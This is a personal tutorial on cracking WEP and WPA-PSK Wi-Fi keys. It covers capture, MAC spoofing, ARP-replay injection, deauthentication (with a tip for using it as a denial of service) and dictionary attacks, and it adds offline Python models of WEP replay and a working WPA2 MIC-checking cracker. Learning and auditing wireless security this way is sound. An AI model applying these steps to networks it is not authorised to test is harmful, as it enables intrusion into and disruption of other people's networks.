
Ok, I know there are tons of docs out there on this and it has been done a million times. This is just for my personal reference. I always knew WEP was insecure, I just never did anything about it (found it boring). So on one bored night I decided to find out how long it would take to break into my own MAC-filtered, 128-bit WEP network. It took about 1 hour to gather all the IVs I needed and to crack the key. So here's how to do it.

I will usually find the network I want to attack using Kismet. Then let the fun begin.
Now we can start up airodump-ng to capture everything we need. (wlan0 is assumed to already be in monitor mode; airmon-ng puts it there, and the same interface is used for injection below.)

airodump-ng -w wepcrack -c 1 wlan0
(-w is the capture file prefix, so the dump lands in wepcrack-01.cap; -c locks the card to the AP's channel, which you also need for injection to work.)

To save headaches with MAC filtering, let's just spoof our MAC to that of a client that is already connected or one you know is allowed (airodump-ng lists associated clients under the AP's BSSID).
(If nobody is connected and MAC filtering is enabled, you are kind of out of luck.)
ifconfig wlan0 down
ifconfig wlan0 hw ether 00:11:22:33:44:55   (placeholder: use the allowed client's MAC; it has to be a unicast address, i.e. an even first octet, or the kernel refuses to set it)
ifconfig wlan0 up
(Taking the interface down stops a running airodump-ng, so either spoof before you start capturing or restart the capture afterwards.)

There, much better: MAC filtering is defeated.

Ok, now that airodump-ng is capturing, let's inject some traffic to generate IVs. In airodump-ng the #Data column is the number of captured data frames, i.e. IVs. With the older statistical (FMS/KoreK) attacks you need around 300,000 IVs for a 64-bit key and about 1 million for a 128-bit key; the PTW attack in aircrack-ng 0.9 and later usually gets by with a few tens of thousands. Either way it varies with the key. On to the injection: aireplay-ng's ARP-request replay mode (-3) re-sends a captured encrypted ARP request over and over, and since WEP has no replay protection the AP answers every copy with a reply under a fresh IV.

Note: If you cannot get any ARP requests, a de-auth against the client will often generate some traffic for you, because the client reconnects and usually ARPs for its gateway as it does. aireplay-ng's deauth mode (-0) does this; it takes a count and is aimed at the AP with -a and the client with -c.
(If you want to DoS the client instead, change the deauth count from 20 to 0, which makes it loop rather than run 20 times.)
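To show what the #Data count and the ARP replay actually are, here is an added example in Python; it is not the author's code and not part of aircrack-ng. It models the WEP frame body (3-byte IV, key index byte, RC4(IV||key) over data plus CRC32 ICV), an access point that accepts a replayed encrypted ARP request and answers each copy under a fresh IV, and the known-plaintext trick that gives the first keystream bytes of every IV (the input the statistical key recovery works from). The WEP key, the IVs, the MACless ARP bodies and the toy AP are all constructed so it runs offline.

```python
# Added example, not from the original post: a toy model of what airodump-ng's
# #Data column counts during ARP-request replay against WEP. The key, IVs and
# frame contents are constructed so it runs offline; the WEP framing itself
# (3-byte IV, key index byte, RC4(IV||key) over data||CRC32 ICV) is the real one.
import struct
import zlib

# LLC/SNAP header of an ARP payload (EtherType 0x0806): known plaintext at the
# start of every ARP frame, which yields the first 8 keystream bytes for its IV.
SNAP_ARP = bytes.fromhex("aaaa030000000806")


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 key scheduling plus keystream generation, XORed over data."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body: IV(3) | key index(1) | RC4(IV||key)(plaintext || ICV)."""
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    return iv + b"\x00" + rc4(iv + wep_key, plaintext + icv)


def wep_decrypt(wep_key: bytes, body: bytes) -> bytes:
    """Strip IV/key index, decrypt, and verify the ICV (raises on tampering)."""
    plain = rc4(body[:3] + wep_key, body[4:])
    data, icv = plain[:-4], plain[-4:]
    if struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF) != icv:
        raise ValueError("bad ICV")
    return data


class ToyAccessPoint:
    """The property the attack relies on: WEP has no replay protection, so the
    AP accepts the same encrypted ARP request again and again, and answers each
    one with a reply under a fresh IV (modelled here as a 24-bit counter)."""

    def __init__(self, wep_key: bytes):
        self.key = wep_key
        self.next_iv = 0

    def handle(self, body: bytes) -> bytes:
        wep_decrypt(self.key, body)  # ICV checks out, so it is accepted even if replayed
        iv = self.next_iv.to_bytes(3, "big")
        self.next_iv = (self.next_iv + 1) % (1 << 24)
        reply = SNAP_ARP + bytes.fromhex("0001080006040002") + bytes(20)  # constructed ARP reply
        return wep_encrypt(self.key, iv, reply)


def arp_replay(ap: ToyAccessPoint, captured_request: bytes, count: int) -> list:
    """What ARP-request replay does: resend one captured request, collect the replies."""
    return [ap.handle(captured_request) for _ in range(count)]


def distinct_ivs(frames) -> set:
    """The quantity airodump-ng's #Data column is tracking."""
    return {f[:3] for f in frames}


def keystream_prefix(frame: bytes):
    """(IV, first 8 keystream bytes) recovered from the known SNAP header."""
    return frame[:3], bytes(c ^ p for c, p in zip(frame[4:12], SNAP_ARP))


def demo(replays: int = 1000):
    key = bytes.fromhex("0123456789abcdef0123456789")  # constructed 104-bit ("128-bit") WEP key
    ap = ToyAccessPoint(key)
    request = wep_encrypt(key, b"\xca\xfe\x01", SNAP_ARP + bytes.fromhex("0001080006040001") + bytes(20))
    replies = arp_replay(ap, request, replays)
    iv, ks = keystream_prefix(replies[0])
    # Returns: number of distinct IVs harvested, first IV, its recovered keystream,
    # and the true keystream for comparison (they match).
    return len(distinct_ivs(replies)), iv, ks, rc4(iv + key, bytes(8))


if __name__ == "__main__":
    n, iv, ks, _ = demo()
    print(f"{n} distinct IVs harvested; IV {iv.hex()} leaks keystream {ks.hex()}")
```

Every replayed request costs the AP one fresh IV, which is why a single captured ARP frame is enough to drive the #Data counter into the hundreds of thousands, and why the recovered (IV, keystream) pairs are what the key-recovery step consumes.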

That's it! Once aircrack-ng has enough IVs from the capture file it prints the key. Now I will quickly go through WPA-PSK. Basically, the only way I found to attack it is a dictionary attack against the PSK.

The goal here is to capture the 4-way handshake. So do the de-auth as described above to force the client to disconnect and reconnect, in hopes of catching the handshake. Sometimes this takes multiple tries. What I do is just keep running aircrack-ng against the active dump file to see whether I have a handshake yet; it shows "1 handshake" next to the BSSID once it does. (You do not actually need all four messages: the dictionary attack only needs the ANonce from message 1 or 3 and the SNonce plus MIC from message 2.)
(You can also open the file in Ethereal (now Wireshark) with the display filter eapol to see exactly what the handshake looks like.)

Once you have it, you can stop capturing traffic.

Now you can run aircrack-ng with the WPA option (-w) and point it at your dictionary file. But I had troubles passing my very big dictionary file to it. So I then turned to cowpatty. Very straightforward; run it without arguments to see the available options. Both tools also need the SSID (cowpatty's -s), because each candidate passphrase is run through PBKDF2-SHA1 salted with the SSID for 4096 rounds before it can be checked against the handshake MIC, which is why this is slow and why precomputed tables only help for one SSID at a time.
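What the dictionary attack actually computes per word, as an added example in Python; this is not the author's code and not aircrack-ng's or cowpatty's implementation. It derives the PMK from the candidate passphrase and SSID, expands it to the PTK with both MACs and both nonces, and checks the HMAC of EAPOL message 2 against the MIC the client sent, which is why messages 1 and 2 are all you need from the capture. The SSID HomeNet, the two MACs, the nonces and the EAPOL message 2 frame are constructed placeholders; it assumes WPA2-PSK/CCMP (key descriptor version 2, HMAC-SHA1-128 MIC), whereas original WPA/TKIP uses HMAC-MD5 for the MIC with the same PMK and PTK derivation.

```python
# Added example, not from the original post: the computation aircrack-ng's WPA
# mode and cowpatty perform for every dictionary word, run against a handshake
# whose SSID, MACs, nonces and EAPOL message 2 are constructed so it runs offline.
# Assumes WPA2-PSK/CCMP (Key Descriptor Version 2: HMAC-SHA1-128 MIC).
import hashlib
import hmac
import struct

# EAPOL hdr(4) + descriptor(1) + key info(2) + key len(2) + replay ctr(8)
# + nonce(32) + key IV(16) + RSC(8) + key ID(8) = 81: where the MIC field starts.
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PSK -> PMK: PBKDF2-HMAC-SHA1, 4096 rounds, salted with the SSID (the slow step)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-384 for CCMP; the first 16 bytes are the KCK that keys the EAPOL MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(3):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:48]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC over the whole EAPOL-Key frame with its 16-byte MIC field zeroed."""
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP): RSN descriptor (2), key info
    0x010a = Pairwise|MIC|Version 2, key length 0, replay counter 1, SNonce,
    zero key IV / RSC / key ID, empty MIC, no key data."""
    body = (struct.pack(">BHHQ", 2, 0x010A, 0, 1) + snonce + bytes(16) + bytes(8)
            + bytes(8) + bytes(16) + struct.pack(">H", 0))
    return struct.pack(">BBH", 1, 3, len(body)) + body  # EAPOL v1, type 3 (Key)


def crack(handshake: dict, wordlist):
    """Dictionary attack: return the first word whose derived KCK reproduces the MIC."""
    for word in wordlist:
        pmk = pmk_from_passphrase(word, handshake["ssid"])
        kck = ptk_from_pmk(pmk, handshake["ap_mac"], handshake["client_mac"],
                           handshake["anonce"], handshake["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, handshake["msg2"]), handshake["mic"]):
            return word
    return None


def make_handshake(passphrase: str) -> dict:
    """Constructed handshake as a real client and AP would produce it, for the demo."""
    ssid = "HomeNet"  # placeholder SSID
    ap_mac, client_mac = bytes.fromhex("001122334455"), bytes.fromhex("0011223344aa")  # placeholders
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))  # fixed nonces for reproducibility
    msg2 = build_msg2(snonce)
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, client_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, msg2)
    msg2 = msg2[:MIC_OFFSET] + mic + msg2[MIC_OFFSET + 16:]
    return dict(ssid=ssid, ap_mac=ap_mac, client_mac=client_mac,
                anonce=anonce, snonce=snonce, msg2=msg2, mic=mic)


if __name__ == "__main__":
    hs = make_handshake("correct horse")
    print("recovered:", crack(hs, ["letmein1", "Password1", "correct horse", "hunter22"]))
```

Note that nothing in the capture is decrypted; each candidate is accepted or rejected purely on whether it reproduces the 16-byte MIC, so a wordlist that does not contain the passphrase yields nothing no matter how long it runs.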